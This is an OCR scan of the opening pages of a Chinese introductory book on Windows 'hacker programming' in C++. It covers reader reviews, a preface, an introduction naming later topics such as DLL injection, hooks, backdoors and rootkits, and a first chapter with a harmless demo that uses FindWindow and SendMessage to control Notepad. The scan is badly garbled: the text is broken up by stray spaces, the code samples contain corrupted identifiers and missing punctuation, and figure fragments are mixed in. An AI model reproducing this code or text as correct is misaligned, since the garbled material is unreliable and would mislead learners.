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瑟 声 


网 书评 


这 是 我 的 第 一 i 本 书 内 容 几乎 涵盖 了 反 病 毒 领 域 的 
所 有 基础 性 的 知识 ， 认 真 研究 完 之 后 ， 那 么 就 具备 了 成 为 一 名 反 病 毒 工程 师 的 
基本 素养 。 当 然 更 多 的 内 容 是 需要 在 实践 中 去 学 习 的 而 本 书 无 疑 是 一 本 极 好 
的 引路 名 师 。 最 后 ， 对 于 本 书 ， 我 是 强力 推荐 ， 也 请 大 家 支持 正版 书籍 。 


( 1 ) 真正 的 好 书 ， 点 到 就 让 人 明白 ， 能 让 你 轻松 了 解 ， 并 掌握 注入 等 难点 。 

( 2 ) 几乎 是 手把手 地 指导 ， 确 实 能 学 到 很 多 有 意思 的 东西 。 

( 3 ) 不 错 ， 挺 全 的 ， 稍 微 有 点 C++ 基础 就 能 看 懂 | 学 会 了 很 多 新 的 知识 ， 
这 是 其 他 教程 没有 的 。 


京东 网 所 证 


真心 地 告诉 你 ， 不 错 ， 很 不 错 ! 这 本 书 在 安全 方面 写 得 还 是 比较 好 的 ， 学 习 
以 后 可 以 去 金山 这 些 公司 应 聘 ， 肯 定 有 用 。 


亚马逊 网 书 讨 


如 果 你 想 要 成 为 一 个 黑客 ， 如 果 你 想 知道 常见 的 黑客 技术 是 如 何 实现 的 ， 
我 相信 这 本 书 是 一 个 好 的 选择 。 
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市 面 上 关于 黑客 入 门 的 书籍 较 多 ， 比 如 黑客 图 解 入 门类 、 黑 客 工 j 


内 容 提要 




















详解 类 、 黑 客 木 马 攻防 类 等 ， 


但 是 ， 对 于 很 多 读者 来 说 ， 可 能 并 不 是 掌握 简单 的 工具 就 够 了 。 很 多 读者 学 习 黑 客 知识 是 为 了 真正 





掌握 与 安全 相关 的 知识 。 
Web 安全 、 网 络 安全 等 ， 





与 安全 相关 的 知识 涉及 面 比较 广 ， 包 括 数据 安全 、 存 储 安全 、 系 统 安全 、 
本 书 围绕 Windows 系统 下 应 用 层 的 开发 来 介绍 一 些 安全 方面 的 知识 。 











本 书 是 在 第 2 版 的 基础 上 新 添加 了 一 些 内 容 ， 同 时 也 删除 了 一 些 过 时 的 内 容 。 本 书 以 Win32 应 








用 层 下 的 安全 开发 为 中 心 ， 介 绍 Windows 系统 下 的 安全 开发 











本 书 介绍 了 操作 系统 的 相关 操作 ， 比 如 进程 、 线 程 、 注 册 表 等 知识 。 当 读者 掌握 了 关于 进程 、 











线程 、 注 册 表 等 的 开发 知识 后 ， 就 可 以 用 代码 实现 一 些 常规 的 操作 ， 如 对 进程 、 注 册 表 、 文 件 等 进 
行 操作 ， 这 样 ， 一 些 日 常 的 操作 可 与 学 习 的 编程 知识 相 结合 。 除 了 操作 外 ， 本 书 还 介绍 了 网 络 应 用 
程序 的 开发 技术 ， 了 解 Winsock 的 开发 后 ， 读 者 就 会 明白 在 应 用 层 客户 端 与 服务 器 端 通信 的 原理 。 








海 然 ， 





打下 基础 。 


除了 介绍 Win32 开发 外 ， 本 书 还 介绍 了 PE 结构 、 调 试 接 
恶意 程序 、 专 杀 工 具 、 扫 描 器 等 的 
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口 、 道 向 等 知识 。 本 书 最 后 剖析 了 
开发 技术 ， 以 帮助 读者 更 好 地 了 解 安全 知识 ， 为 开发 安全 的 软件 








我 与 费 云 兄 因 参 加 黑客 反 病毒 论坛 会 议 结识 ， 在 认识 初期 就 能 感觉 到 费 云 兄 是 一 个 非常 
踏实 且 又 富有 思想 的 人 ， 对 安全 编程 的 诸多 方面 也 有 自己 独到 的 认识 ， 这 令 我 十 分 欣赏 。 认 
识 几 个 月 后 ， 通 过 一 次 无 意 的 聊天 ， 我 有 幸 读 到 旨 云 兄 《C++ 黑 客 编程 揭秘 与 防范 》 第 1 版 ， 
而 后 承 费 云 兄 高 看 ， 才 得 以 诞生 此 序 。 

通过 阅读 《C++ 黑客 编程 揭秘 与 防范 》 第 1 版 ， 我 有 一 种 相 见 恨 晚 的 感觉 。 这 本 书 从 最 
基本 的 Windows 编程 到 Windows 下 的 各 种 安全 编程 技术 都 有 涉及 , 例如 PE 文件 、 DLL 注入 
技术 、 各 种 Hook 技术 、 后 门 编写 的 技术 关键 点 ， 乃 至 像 MBR 的 解析 这 种 很 难 涉及 的 点 与 
Rootkit 编程 这 样 比较 深入 的 知识 点 ， 都 有 恰到好处 的 介绍 与 详解 。 

因此 ， 就 整 书 而 言 ， 将 诸如 文件 /注册 表 操作 、 网 络 通信 、PE 文件 、Rootkit、 道 向 工程 
等 数 个 知识 点 有 效 组 织 在 一 起 ， 是 一 个 非常 巨大 的 工程 。 对 于 有 过 类 似 写作 经 验 的 我 来 说 ， 
这 方面 的 体会 尤其 深刻 。 但 是 不 得 不 说 ， 作 为 读者 ， 我 真 的 非常 幸运 ， 首 先 拜 读 了 这 本 书 。 
就 我 个 人 而 言 ， 这 本 书 至 少 可 以 被 当成 一 部 “技术 字典 ”来 使 用 。 当 我 在 实际 的 工作 中 对 某 
种 技术 生 朴 后 ， 可 以 拿 起 这 本 书 翻 一 翻 ， 顿 时 会 感觉 受益 菲 浅 。 

从 整 书 的 结构 以 及 知识 的 组 织 方式 来 看 ， 不 难 发 现 ， 这 其 实 是 一 本 相当 重视 初学 者 技术 
的 图 书 。 第 1 章 对 于 工作 环境 的 搭建 以 及 对 应 IDE 的 使 用 都 做 了 必要 的 介绍 ， 第 2 章 使 用 一 
个 非常 有 趣 且 简单 的 例子 教 读者 如 何 打造 一 个 木马 的 雏形 ， 这 些 无 不 体现 出 了 作者 对 于 基础 
薄弱 的 读者 的 细心 照顾 。 

除 此 之 外 ， 当 前 的 政策 环境 以 及 社会 整体 的 大 环境 都 对 信息 安全 产业 释放 了 大 量 的 利好 
信号 ， 无 论 是 国家 将 信息 安全 提 到 国家 战略 层面 ， 还 是 发 生 在 美国 的 著名 “棱镜 门 ” 事 件 ， 
抑或 是 当前 的 移动 互联 网 大 潮 ， 都 在 预示 着 信息 安全 领域 人 才 在 未 来 势必 将 摆脱 “边缘 群 
体 ” 进而 成 为 “主流 群体 ”中 重要 的 一 员 。 这 些 改变 势必 将 极 大 地 加 剧 当前 信息 安全 领域 人 
才 的 稀缺 现状 ， 但 是 ， 我 相信 本 书 定 会 为 中 国 的 信息 安全 领域 崛起 贡献 一 份 力量 ， 进 而 使 得 
更 多 的 读者 从 信息 安全 的 “门外汉 ”成 为 “ 圈 内 人 ” 以 缓解 信息 安全 领域 人 才 稀 缺 的 现状 。 


一 一 任 晓 一 [A1Pass]， 北 京 蓝 森 科技 有 限 公司 创始 人 ， 
15PB 计算 机 高 端 培训 品牌 创始 人 ,《 黑 客 免 杀 攻防 》 作 者 
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备 受 关注 的 黑客 到 底 是 什么 


什么 是 黑客 ? 百度 百科 里 黑客 的 含义 如 下 《摘自 百度 百科 ， 略 有 改动 ): 

热衷 研究 、 撰 写 程序 的 专 才 ， 精 通 各 种 计算 机 语言 和 系统 ， 且 必须 具备 乐于 追根 究 底 、 
穷 究 问题 的 特质 . “黑客 ”一 词 是 由 英语 Hacker 音译 出 来 的 ， 是 指 专门 研究 、 发 现 计算 机 和 
网 络 漏洞 的 计算 机 爱好 者 。 早 期 在 美国 的 电脑 界 是 带 有 讲义 的 。 

看 到 上 面 百度 百科 给 出 的 黑客 含义 后 ， 很 多 只 会 使 用 工具 的 所 谓 的 “黑客 ”就 能 明白 一 
个 道理 ， 即 黑客 是 要 会 编写 程序 的 。 

再 看 一 下 百度 百科 里 对 只 会 使 用 工具 的 黑客 的 解释 〈 搞 自 百度 百科 ): 

脚本 小 子 (script kiddie 或 script boy )“ 指 的 是 用 别人 写 的 程序 的 人 。 脚 本 小 子 是 一 个 贬 
义 词 ， 用 来 描述 以 黑客 自居 并 沾沾自喜 的 初学 者 。” 

那些 自以为是 的 工具 黑客 只 不 过 是 一 个 “脚本 小 子 >， 是 不 是 心里 觉得 不 是 很 舒服 了 ? 是 
不 是 觉得 自己 应 该 提高 了 ? 如 果 是 的 话 ， 那 么 就 请 抛 开 以 前 当 工具 黑客 的 想法 ， 开 始 学 习 编 
写 程序 吧 ! 


思想 准备 


新 手 可 能 会 问 : 编写 自己 的 黑客 工具 是 不 是 很 难 ? 是 不 是 要 懂 编 程 语 言 ? 要 懂 哪 种 编程 
语言 呢 ? 笔者 的 回答 是 肯定 的 。 抛 开 用 工具 的 想法 ， 其 实 是 让 大 家 抛 开 浮躁 的 想法 ， 认 真 地 
学 一 些 真正 的 技术 ， 哪 怕 只 是 一 些 入 门 的 知识 。 想 做 黑客 就 要 有 创新 、 研 发 的 精神 ， 如 果 只 
是 做 一 个 只 会 用 软件 的 应 用 级 的 计算 机 使 用 者 ， 那 么 必定 永远 达 不 到 黑客 级 的 水 平 ， 因 为 工 
具 人 人 都 会 用 ， 而 你 只 是 比 别人 多 知道 几 个 工具 而 已 。 抛 开 浮躁 ， 静 下 心 来 从 头 开 始 学 习 基 
础 ， 为 将 来 的 成 长 做 好 足够 的 准备 。 


攻防 的 广义 性 


黑客 做 得 最 多 的 就 是 “入 侵 ” 这 里 所 说 的 入 侵 不 是 一 个 狭义 上 的 入 侵 ,， 因 为 它 不 单单 针 
对 网 络 、 系 统 的 入 侵 。 这 里 说 的 是 一 个 广义 上 的 入 侵 ,“ 入 侵 ” 一 词 是 指 “ 在 非 授权 的 情况 ， 
试图 存 取信 息 、 处 理 信息 或 破坏 系统 以 使 系统 不 可 靠 、 不 可 用 的 故意 行为 。” 由 此 可 以 看 出 ， 
入 侵 并 非 单 指 网 络 或 系统 。 这 里 说 的 “入 侵 ” 包 括 两 个 方面 ， 一 个 是 针对 网 络 〈 系 统 ) 的 入 
侵 ， 另 一 个 是 针对 软件 的 入 侵 。 网 络 的 入 侵 是 通常 意义 上 的 入 侵 ， 而 软件 的 入 侵 通常 就 是 人 
们 说 的 软件 破解 (包括 漏洞 挖掘 等 内 容 )。 无 论 是 侵入 别人 系统 ， 还 是 破解 某 款 软件 ， 都 是 在 
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非 授权 的 情况 下 得 到 相应 的 权限 ， 比 如 系统 权限 或 者 软件 的 使 用 权限 。 这 些 “ 入 侵 ” 都 是 为 
了 寻找 系统 的 安全 漏洞 ， 以 便 更 好 地 完善 系统 的 安全 。 


本 书 内 容 


本 书 针对 “网 络 入 侵 ” 和 “软件 入 侵 ” 两 方面 来 介绍 黑客 编程 ， 从 攻防 两 个 角度 来 学 习 
黑客 编程 的 知识 ， 通 过 一 系列 知识 体系 完成 “黑客 编程 ”的 养 成 计划 。 

本 书 会 介绍 大 量 的 基础 知识 ,这 些 基 础 知识 看 起 来 与 普通 的 应 用 程序 编程 没有 什么 差别 。 
其 实 ， 所谓 “黑客 编程 ”( 也 称 为 “安全 编程 ”)， 是 指 “ 采 用 常规 的 编程 技术 ， 编 写 网 络 安 
全 、 黑 客 攻 防 类 的 程序 、 工 具 ”。 因 此 ， 普 通 的 编程 技术 与 黑客 编程 技术 并 没有 本 质 的 差别 ， 
只 是 开发 的 侧重 点 不 同 。 普 通 的 编程 注重 的 是 客户 的 需求 ， 而 黑客 编程 注重 的 则 是 攻 与 防 。 

黑客 编程 有 其 两 面 性 ， 按 照 攻防 角度 可 以 分 为 “攻击 类 入 侵 编程 ”和 “防范 类 安全 编 
程 ”。 结 合 上 面 提 到 的 “网 络 ” 和 “软件 ”两 方面 来 说 ， 常 见 的 “网 络 攻击 ”程序 有 扫描 
器 、 嗅 探 髓 、 后 门 等 ， 常 见 的 “软件 攻击 ”程序 有 查 壳 器 、 动 态 调试 器 、 静 态 分 析 器 、 
补丁 等 《这 些 工 具 是 一 些 调 试 工 具 和 逆向 分 析 工 具 ， 因 为 软件 破解 、 漏 洞 挖掘 等 会 用 到 
这 些 调试 工具 ， 所 以 称 其 为 “软件 攻击 ”工具 )。 常 见 的 “网 络 〈 系 统 ) 防范 ”程序 有 “ 杀 
毒 软件 ”“ 防 火 墙 %“ 主 动 防御 系统 ”等 ， 常见 的 “软件 防范 ”程序 有 “ 壳 ”“ 加 密 狗 ”“ 电 
子 令 牌 ”等 。 

根据 前 面 提 到 的 攻防 两 方面 的 内 容 ， 本 书 会 涉及 扫描 器 的 开发 、 后 门 的 开发 、 应 用 层 抓 
包 器 的 开发 等 黑客 攻防 方面 的 内 容 。 本 书 还 会 讲解 关于 软件 方面 的 知识 ， 主 要 涉及 PE 结构 、 
加 部 、 脱 这、 道 向 分 析 等 知识 。 由 于 技术 的 两 面 性 ， 希 望 读者 有 一 个 良好 的 学 习 心态 ， 把 学 
到 的 技术 用 到 安全 保护 上 。 


读者 能 从 本 书 中 得 到 什么 


通过 本 书 , 读者 能 学 到 Windows 下 基于 消息 的 软件 开发 、 基 于 Winsock 的 网 络 应 用 程序 
的 开发 、 软 件 逆 向 分 析 和 调试 等 方面 的 编程 、 调 试 及 安全 知识 。 在 学 习 的 过 程 中 ， 读 者 应 该 
大 量 阅读 和 参考 其 他 相关 资料 ， 并 且 一 定 要 亲自 动手 进行 编程 。 编 程 绝对 不 是 靠 看 书 能 够 学 
会 的 ! 

通过 本 书 的 指导 , 再 加 上 自身 实践 和 练习 , 读者 可 以 具备 Windows 下 基本 的 应 用 程序 开 
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到 初级 的 病毒 分 析 、 软 件 保 护 等 相关 的 安全 知识 。 


如 何 无 障碍 阅读 本 书 


阅读 本 书 的 读者 最 好 具有 C 和 C++ 编程 的 基础 知识 ， 有 其 他 编程 语言 基础 知识 的 读者 也 
可 以 无 障碍 阅读 。 对 于 无 编程 知识 的 读者 ， 在 阅读 本 书 的 同时 ， 只 要 学 习 了 本 书 中 涉及 的 相 
关 基 础 知识 ， 同 样 可 以 阅读 本 书 。 

本 书 涉及 范围 较 多 ， 知 识 面 比较 杂 ， 但 是 本 书 属于 入 门 级 读物 ， 专 门 为 新 手 准 备 ， 只 要 
读者 具备 一 定 的 基础 知识 ， 即 可 顺利 进行 阅读 。 在 阅读 本 书 的 基础 上 ， 读 者 可 以 接着 学 习 更 
深层 次 的 知识 ， 希 望 本 书 能 帮助 读者 提高 自身 的 能 力 。 
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建议 读者 深入 学 习 操 作 系 统 原 理 、 数 据 结构 、 编 译 原理 、 计 算 机 体系 结构 等 重要 的 计算 
机 基础 知识 。 


免责 


本 书 中 内 容 主 要 用 于 教学 ， 指 导 新 手 如 何 入 门 、 如 何 学 习 编程 知识 ， 从 编程 的 过 程 中 了 | _ 
解 黑客 编程 的 基础 知识 。 请 勿 使 用 自己 的 知识 做 出 有 碍 公德 之 事 ， 在 准备 通过 技术 手段 进行 | 与 
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出 版 社 无 任何 关系 ， 请 读者 自觉 遵守 国家 法 律 。 

由 于 作者 水 平 有 限 ， 书 中 难免 会 有 差错 ， 敬 请 谅解 。 ee 

编辑 联系 邮箱 : zhangtao@ptpress.com.cn。 
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如 果 您 对 本 书 有 任何 疑问 或 建议 , 请 您 发 邮件 给 我 们 , 并 请 在 邮件 标题 中 注 明 本 书 书 名 ， 
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章 】 黑客 编程 入 门 


读者 是 否 曾 经 用 别人 开发 的 工具 尝试 “入 侵 ” 对 自己 的 系统 进行 安全 检查 ,是 否 希 望 开 
发 出 自己 的 “ 黑 器 ”? 本 章 将 介绍 Windows 操作 系统 的 开发 基础 ， 将 带领 读者 进入 Windows 
编程 的 大 门 。 

Windows 是 一 个 庞大 而 复杂 的 操作 系统 ， 它 提供 了 丰富 而 强大 的 功能 ， 不 但 操作 灵活 方 
便 ， 而 且 有 众多 的 应 用 软件 对 其 进行 支持 。Windows 因 有 众多 软件 的 支持 ， 从 而 长 期 雄霸 于 
PC 系统 。 之 所 以 有 众多 软件 的 支持 ， 是 因为 Windows 提供 了 良好 的 应 用 程序 开发 平台 〈 接 
口 )、 完整 的 开发 文档 和 各 种 优秀 的 开发 环境 。 对 于 一 个 程序 员 来 说 , 除了 要 掌握 基本 的 开发 
语言 以 外 ， 还 要 掌握 具体 的 开发 环境 和 系统 平台 的 相关 知识 ; 在 掌握 编程 语言 和 开发 环境 等 
知识 后 ， 还 要 掌握 调试 技术 以 及 各 种 调试 分 析 工 具 。 同 样 ，Windows 操作 系统 提供 了 良好 的 
调试 接口 ， 并 且 有 非常 多 的 调试 工具 。 

本 章 主要 介绍 Windows 的 消息 机 制 ，Windows 下 的 开发 工具 、 辅 助 工 具 ， 还 有 调试 工具 。 
本 章 的 目的 在 于 对 Windows 操作 系统 的 消息 机 制 进行 回顾 ， 它 是 Windows 开发 的 基础 ， 方 便 后 
续 章 节 内 容 的 学 习 。 本 章 对 于 Windows 编程 的 一 些 基本 概念 不 会 进行 过 多 的 介绍 。 除 了 对 消息 机 
制 进行 回顾 外 ， 本 章 还 要 介绍 集成 在 Visual C++ (VC6) 中 的 调试 工具 和 其 他 一 些 开 发 辅助 工具 。 


1.1 初 识 Windows 消息 


大 部 分 Windows 应 用 程序 都 是 基于 消息 机 制 的 (命令 行 下 的 程序 并 不 基于 消息 机 制 )， 
熟悉 Windows 操作 系统 的 消息 机 制 是 掌握 Windows 操作 系统 下 编程 的 基础 。 本 节 将 带领 读 
者 认识 和 熟悉 Windows 的 消息 机 制 。 


1.1.1 对 消息 的 演示 测试 


在 真正 学 习 和 认识 消息 之 前 , 先 来 完成 一 个 简单 的 任务 , 看 看 消息 能 完成 什么 样 的 工作 。 
首先 写 一 个 简单 的 程序 ， 通 过 编写 的 程序 发 送 消 息 来 关闭 记事 本 的 进程 、 获 取 窗 口 的 标题 和 
设置 窗口 的 标题 。 

程序 的 具体 代码 如 下 : 


void CMsgTestDlg: :OnClose() 


{ 
// 在 此 处 添加 处 理 程序 代码 
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1 之 前 著 明 


过 


HWND hWnd = ::FindWindow("Notepad", NULL); 
if ( hwnd == NULL ) 
{ 

AfxMessageBox ("没有 找到 记事 本 ") ; 


EOE 


} 


: :SendMessage (hWnd, WM CLOSE， NULL, NULL); 
} 


void CMsgTestDlg::OnExec () 


{ 

// 在 此 处 添加 处 理 程序 代码 

WinBxec (notePpad.exe" SW SHOW) ; 
} 


void CMsgTestD1g: :OnEditWwna() 


{ 
// 在 此 处 添加 处 理 程序 代码 
HWND hwnd = ::FindWindow (NULL，" 无 标题 - 记事 本 ")， 
if ( hWnd == NULL ) 
{ 
AfxMessageBox ("没有 找到 记事 本 ")， 


return 3 


】 


char *pCaptionText = "消息 测试 "5 
::SendMessage (hWnd, WM SETTEXT, (WPARAM)O0, (LPARAM)pCaptionText); 
} 


void CMsgTestDlg: :OnGetWnd () 


// 在 此 处 添加 处 理 程序 代码 
HWND hWnd = ::FingdWindow ("Notepad", NULL); 
if ( hwnd == NUELL ) 
{ 
AfxMessageBox ("没有 找到 记事 本 ") ; 
return ; 


} 


char pCaptionText [MAXBYTE] = { 0 7 
::SendMessage (hWnd, WM GETTEXT, (WPARAM)MAXBYTE, (LPARAM)pCaptionText); 


AfxMessageBox (pCaptionText); 


} 

编写 的 代码 中 有 4 个 函数 : 第 1 个 函数 OnClose() 是 用 来 关闭 记事 本 程序 的 ; 第 2 个 函数 
OnExecO 是 用 来 打开 记事 本 程序 的 ， 主 要 是 测试 其 他 3 个 函数 时 可 以 方便 地 打开 记事 本 程序 ; 
第 3 个 函数 OnEditWnd() 是 用 来 修改 记事 本 标题 的 , 第 4 个 函数 OnGetWnd() 是 用 来 获取 当前 
记事 本 标题 的 。 程 序 的 界面 如 图 1-1 所 示 。 





图 1-1 消息 测试 窗口 


简单 测试 一 下 这 个 程序 。 首 先 单 击 “打开 记事 本 程序 ”按钮 ， 出 现 记事 本 的 窗口 (表示 
记事 本 程序 被 打开 了 ); 接着 单 击 “修改 记事 本 标题 ”按钮 ， 可 以 发 现 记 事 本 程序 的 窗口 标题 








1.1 初 识 Windows 消息 





改变 了 ; 再 单 击 “ 获 取 记 事 本 标题 ”按钮 ， 弹 出 记事 本 程序 窗口 标题 的 一 个 对 话 框 ， 最 后 单 
击 “ 关 闭 记 事 本 程序 ”按钮 ， 记 事 本 程序 被 关闭 。 


1.1.2 ”对 “消息 测试 ”程序 代码 的 解释 


上 面 的 代码 中 要 学 习 的 API 函数 有 两 个 ， 分 别 是 FindWindowO 和 SendMessage()。 下 面 
看 一 下 它们 在 MSDN 中 的 定义 。 
FindWindow() 函 数 的 定义 如 下 : 
HWND FindWindow'( 
LPCTSTR lpClassName, 
SR lpWindowName 
ET 函数 的 功能 是 ， 通 过 指定 的 窗口 类 名 (lpClassName) 或 窗口 标题 
(lpWindowName) 查找 匹配 的 窗口 并 返回 最 上 层 的 窗口 句柄 。 简 单 理解 就 是 ， 通 过 指定 的 窗 
口 名 (窗口 名 相对 于 窗口 类 来 说 要 直观 些 ， 因 此 往往 使 用 的 是 窗口 名 〉 返回 窗口 句柄 。 
FindWindow() 函 数 有 两 个 参数 ， 分 别 是 lpClassName 和 lpWindowName。 通 过 前 面 的 描述 ， 
该 函数 通常 使 用 的 是 第 2 个 参数 lpWindowName， 该 参数 是 指定 窗口 的 名 称 。 在 例子 代码 中 ， 


为 程序 指定 的 窗口 名 是 “无 标题 一 记事 本 ”。“ 无 标题 一 记事 本 ”是 记事 本 程序 打开 后 的 默认 窗 


口 标题 ， 当 FindWindow0 找 到 该 窗口 时 ， 会 返回 它 的 窗 月 本 例子 代码 中 也 使 用 了 
lpClassName〈 窗 口 类 名 )， 在 窗口 的 名 称 会 改变 的 情况 下 ， 只 能 通过 窗口 类 名 来 获取 窗口 的 
句柄 了 。 
当 使 用 FindWindow(0) 函 数 获取 窗口 句柄 时 ， 指 定 窗口 名 是 比较 直观 和 容易 的 。 但 是 ， 如 
果 窗 口 名 经 常 发 生变 化 时 ， 那 么 就 不 得 不 使 用 窗口 类 名 了 。 
使 用 FindWindow(0) 函 数 返回 的 窗口 句柄 是 为 了 给 SendMessage() 函 数 来 使 用 的 。 
SendMessage() 函 数 的 定义 如 下 : 
LRESULT SendMessage( 
HWND hwnd, 
UINT Msg, 
WPARAM wParam, 
ER lParam 
该 坝 数 的 作用 是 根据 指定 富 口 句柄 将 消息 发 送 给 指定 的 窗口 。 该 函数 有 4 个 参数 ， 第 1 
个 参数 hWnd 是 要 接收 消息 的 窗口 的 窗口 句柄 ， 第 2 个 参数 Msg 是 要 发 送 消息 的 消息 类 型 ， 
第 3 个 参数 wParam 和 第 4 个 参数 lParam 是 消息 的 两 个 附加 参数 。 第 1 个 参数 hWnd 在 前 面 
已 经 介绍 过 了 ， 该 参数 通过 FindWindow() 函 数 获取 。 
在 程序 的 代码 中 ，SendMessage() 函 数 的 第 2 个 参数 分 别 使 用 的 了 WM_CLOSE 消息 、 
WM_ SETTEXT 消息 和 WM_GETTEXT 消息 。 下 面 来 看 这 3 个 消息 的 具体 含义 。 
WM_CLOSE: 将 WM_CLOSE 消息 发 送 后 ， 接 收 到 该 消息 的 窗口 或 应 用 程序 将 要 关闭 。 
WM_CLOSE 消息 没有 需要 的 附加 参数 ， 因 此 wParam 和 lParam 两 个 参数 都 为 NULL。 
WM_SETTEXT: 应 用 程序 发 送 WM_SETTEXT 消息 对 窗口 的 文本 进行 设置 。 该 消息 需 
要 附加 参数 ，wParam 参数 未 被 使 用 ， 必 须 指定 为 0 值 ，lParam 参数 是 一 个 指 问 以 NULL 为 
结尾 的 字符 串 的 指针 。 
WM GETTEXT: 应 用 程序 发 送 WM_GETTEXT 消息 ， 将 对 应 窗口 的 文本 复制 到 调用 者 
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的 缓冲 区 中 。 该 消息 也 需要 附加 参数 ，wParam 参数 指定 要 复制 的 字符 数 数量 ，lParam 是 接 
收文 本 的 缓冲 区 。 

例子 代码 在 VC6 下 进行 编译 连接 ， 生 成 可 执行 文件 后 ， 可 以 通过 按钮 的 提示 进行 测试 ， 
以 便 读者 感性 认识 消息 的 作用 。 


1.1.3 如何 获取 窗口 的 类 名 称 


编写 程序 调用 FindWindow() 函 数 的 时 候 , 通常 会 使 用 其 第 2 个 参数 , 也 就 是 窗口 的 标题 
但 是 有 些 软件 的 窗口 标题 会 根据 不 同 的 情况 进行 改变 ,那么 程序 中 就 不 能 在 FindWindow() 函 
数 中 直接 通过 窗口 的 标题 来 获得 窗口 的 句柄 了 。 而 窗口 的 类 名 通常 是 不 会 变 的 ， 因 此 编程 时 
可 以 指定 窗口 类 名 来 调用 FindWindow(O 函 数 以 便 获 取 窗 口 句柄 。 那 么 ， 如 何 能 获取 到 窗口 的 
类 名 称 呢 ? 这 就 是 将 要 介绍 的 第 1 个 开发 辅助 工具 一 Spy++。 

Spy++ 是 微软 Visual Studio 中 提供 的 
一 个 非常 实用 的 小 工具 ， 它 可 以 显示 系统 。 是 eeeeeeeo epee 
的 进程 、 窗 口 等 之 间 的 关系 ， 可 以 提供 窗 。 /ma 


| 
中 000100A2 “TF_Fio: er 二 ngBar_WndTitie” CiceroUIWndFrame 


口 的 各 种 信息 ， 可 以 对 系统 指定 的 窗口 进 。 | Woreeoeumsrmy en 
叫 001301FE'"”" GadgetWindow_ 10000 


行 消息 的 监控 等 。 它 的 功能 非常 多 ， 这 里 。 | 。 中 REN 00 


门 002B0272 iooltips_class32 





演示 如 何 用 它 来 获取 窗口 的 类 名 称 。 中 mawzpz”GPe FADER ， 
呈 00820352 ”toohtips | 
打开 “开始 ”菜单 ， 在 Visual Studio ER 
的 菜单 路 径 下 找到 Spy++， 打 开 Spy++ 窗 00280120 NSCTRMEUI 


0009052C "Default IME" IME 


口 ， 如 图 1-2 所 示 。 0000020e Me ecreie Uy 
选择 工具 栏 中 的 “Find Window” 按 | Re 
钮 ， 如 图 1-3 所 示 。 Ss 
单 击 “Find Window” 按 钮 ， 出 现 如 图 1-2 “Microsoft'Spyt+” 窗 吕 
图 1-4 所 示 的 窗口 。 
在 图 1-4 中 ， 用 鼠标 左 键 单 击 “Finder Tool” 后 面 的 图 标 ， 然 后 拖 昌 到 指定 的 窗口 上 ， 会 
一 显示 出 “Handlie”( 和 窗口 句柄 )“Caption”( 窗 
口 标题 ) 和 “Class”( 窗 口 类 名 ), 其 中 “Class” 
是 编程 时 要 使 用 的 “窗口 类 ”名 称 。 











Find Window 按 钮 “Hide Spy++ ”是 一 个 比较 实用 的 功能 ， 
它 用 来 隐藏 Spy++ 主 窗口 界面 。 选中 该 复 选 框 
图 1-3 “Find Window” 按 钮 后 ， 拖 中 “Finder Tool” 后 的 图 标 时 ， 图 1-2 


所 示 为 窗口 将 被 隐藏 。 这 个 功能 的 实用 之 处 在 于 ， 有 些 应 用 软件 有 反 Spy++ 的 功能 ， 隐 藏 Spy++ 
主 窗口 有 助 于 避免 被 反 Spy++ 的 软件 检测 到 。 为 什么 隐藏 Spy++ 的 “Find Window” 窗 口 会 有 
反 检 测 的 功能 ， 反 检测 的 原理 是 什么 ?原理 很 简单 ， 目 标 程序 也 是 通过 调用 FindWindow() 函 
数 来 查找 Spy++ 窗 口 的 ， 如 果 有 该 窗口 ， 就 进行 一 些 相应 的 处 理 。 


子 注 : 通过 Spy++ 找 到 的 窗口 句柄 是 不 能 在 编程 中 使 用 的 ， 每 次 打开 窗口 时 ， 窗 口 的 句柄 都 会 改变 。 
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将 “Finder Tool” 后 的 图 标 拖 忠 到 记事 本 的 标题 处 ，Spy++ 的 Find Window 窗口 显示 的 内 
容 如 图 1-5 所 示 。 






Find Window 


“Window Finder 一 一 














: -Window Finder—— ol ea, | 
| | itor tool ed aeons | OK | 


Drag the dn Tool ov 
| selectit, then release the mouse button. Or "| selectit,th 
| enter a window handle lin hexadecimal), Cancel | 1 | entera tv E> 
| ee Wl 1 
Finder Tool: Help | | 和 nd Tool: 证 








| Handle; |ooo406z0 


，| Caption; "无 标题 - 记事 本 " 

















' | Class: Notepad 
”| Style: 14CF0000 
‘Rect: Wve 192 {696, 837) 874x645 
pi ed Luh | 
| Broperties 到 ~ Messages se 9 Bropentes 和 Messages | 
图 1-4 Find Window 窗口 图 1-5 获取 到 信息 的 Find Window 窗口 


从 图 1-5 中 可 以 得 到 记事 本 程序 的 标题 和 类 名 称 。 当 编写 程序 调用 FindWindow() 函 数 ， 
不 能 通过 程序 的 标题 文本 得 到 窗口 的 句柄 时 ， 可 以 通过 窗口 类 名 称 得 到 窗口 的 句柄 。 


1.2 Windows 消息 机 制 的 处 理 


SendMessage() 将 指定 的 消息 发 送 给 指定 的 窗口 ， 窗 口 接收 到 消息 也 有 相应 的 行为 发 生 。 
那么 窗口 接收 到 消息 后 的 一 系列 行为 是 如 何 发 生 的 ? 下 面 通过 熟悉 Windows 的 消息 机 制 来 
理解 消息 处 理 背 后 的 秘密 。 


1.2.1 DOS 程序 与 Windows 程序 执行 流程 对 比 


Windows 下 的 窗口 应 用 程序 都 是 基于 消息 机 制 的 ， 操 作 系 统 与 应 用 程序 之 间 、 应 用 程序 
与 应 用 程序 之 间 ， 大 部 分 都 是 通过 消息 机 制 进行 通信 、 交 互 的 。 要 真正 掌握 Windows 应 用 程 
序 内 部 对 消息 的 处 理 ， 必 须 分 析 实 际 的 源 代码 。 在 编写 一 
个 基于 消息 的 Windows 应 用 程序 前 , 先 来 比较 DOS 程序 和 
Windows 程序 在 执行 时 的 流程 。 

1. DOS 程序 执行 流程 
在 DOS 下 将 编写 完 的 程序 进行 执行 ， 在 执行 时 有 较为 
清晰 的 流程 。 比 如 用 C 语言 编写 程序 后 ， 程 序 执行 时 的 大 
致 流程 如 图 1-6 所 示 。 

在 图 1-6 中 可 以 看 出 ，DOS 程序 的 流程 是 按照 代码 的 
顺序 〈 这 里 的 顺序 并 不 是 指 程序 控制 结构 中 的 顺序 、 分 支 
和 循环 的 意思 ， 而 是 指 程序 运行 的 逻辑 有 明显 的 流程 )》 和 结束 竹 序 
流程 依次 执行 。 大 致 步骤 为 : DOS 程序 从 main() 主 函数 开 图 1-6 传统 DOS 程序 执行 流程 
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始 执 行 (其实 程序 真正 的 入 口 并 不 是 main0 函 数 ); 执行 的 过 程 中 按照 代码 编写 流程 依次 调用 
